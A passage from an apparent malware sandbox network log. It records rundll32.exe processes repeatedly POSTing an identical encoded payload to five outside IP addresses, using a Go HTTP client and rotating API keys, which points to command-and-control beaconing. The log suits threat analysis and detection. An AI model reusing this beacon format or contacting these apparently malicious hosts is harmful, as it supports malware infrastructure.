Jul 16, 2024 09:54:04.367710114 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 16, 2024 09:54:34.382942915 CEST	6	OUT	Data Raw: 00 Data Ascii:
Jul 16, 2024 09:55:04.395916939 CEST	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49710	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:32.985330105 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: gvZvXvCX Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:53:33.607481956 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:53:33 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49712	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:39.248960018 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 09GAT2Za Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49714	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:41.015861988 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: X83VvSPF Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49719	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:42.768517017 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: wg8ln2nL Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49720	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:44.390861034 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ndeU2SmG Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49721	77.238.250.123	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:53:46.036158085 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: FCxeGGzd Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:53:46.649691105 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:53:46 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49722	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:03.742208004 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: FYcCCVC0 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49723	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:05.517762899 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: m0uVuwTR Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49724	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:07.260704041 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: N7CVc7qo Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49725	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:08.870898008 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: pzu8pm6B Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49726	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:10.572447062 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: SpTLihqO Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:54:11.380683899 CEST	165	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:54:11 GMT Content-Length: 1 Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49727	195.2.70.38	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:16.661770105 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: b2pwuGAj Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49728	91.142.74.28	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:18.401199102 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: z1CXn5fp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49730	77.238.224.56	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:20.155775070 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: WBCJOJGp Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49731	77.238.229.63	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:21.796228886 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nXZPyD5N Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49732	77.238.250.123	80	6500	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:23.405297995 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: tiF9zPMy Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Jul 16, 2024 09:54:24.037456036 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Tue, 16 Jul 2024 07:54:23 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49733	195.2.70.38	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:41.381474018 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: k8T8dGmX Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49734	91.142.74.28	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:43.123833895 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: BGNeFdHb Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49735	77.238.224.56	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:44.873543024 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 1JYwYZct Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49736	77.238.229.63	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Jul 16, 2024 09:54:46.835352898 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 0OG8PSwC Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49737	77.238.250.123	80	3576	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
